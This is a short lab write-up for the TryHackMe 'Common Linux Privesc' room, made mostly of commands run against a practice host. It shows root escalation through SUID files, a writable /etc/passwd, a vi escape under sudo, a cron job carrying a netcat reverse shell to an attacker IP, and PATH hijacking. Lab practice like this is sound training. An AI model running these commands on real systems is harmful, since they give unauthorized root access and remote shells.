Common Linux Privesc
Room Link: https://tryhackme.com/room/commonlinuxprivesc
Enumeration
Download LinEnum Script
Kali
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.shLogin to host
Kali
ssh user3@$VICTIM
Password: passwordThe target's hostname
There are 8 users
4 shells
Some users can write to passwd file
Abusing SUID/GUID Files
Victim
find / -perm -u=s -type f 2>/dev/null
Running the shell script in user3 home directory gives us root access right away.
Victim
/home/user3/shell
Exploiting Writeable /etc/passwd
Victim
su user7
Password: passwordVictim
openssl passwd -1 -salt new 123
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd
cat /etc/passwd
su new
Password: 123
Escaping Vi Editor
Victim
su user8
Password: passwordVictim
sudo -l
Victim
sudo vi
:!sh
whoami
Exploiting Crontab
Victim
ssh user4@$VICTIM
Password: passwordKali
msfvenom -p cmd/unix/reverse_netcat lhost=$KALI lport=8888 R
Kali
nc -lvnp 8888Victim
cat /etc/crontab 
Add our payload we made in Kali to the script
Victim
echo 'mkfifo /tmp/cibykaz; nc 10.10.185.2 8888 0</tmp/cibykaz | /bin/sh >/tmp/cibykaz 2>&1; rm /tmp/cibykaz' >> /home/user4/Desktop/autoscript.shWait for the script to run and catch the shell on Kali.
Exploiting PATH Variable
Victim
su user5
Password: passwordThe script in user5 home directory is just doing the command ls.
Victim
cd /home/user5
./script
We now create a script called ls that gives us a bash shell.
Victim
cd /tmp
echo "/bin/bash" > ls
chmod +x lsBefore we change the path we can see ls goes to /bin/ls
Now after running the below command ls is now directed to our script.
Victim
export PATH=/tmp:$PATH
Now the script in user5s directory acts differently, we now have a root shell.
Victim
cd /home/user5
/script 
Run the following to reset the path variable.
Victim
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATHLast updated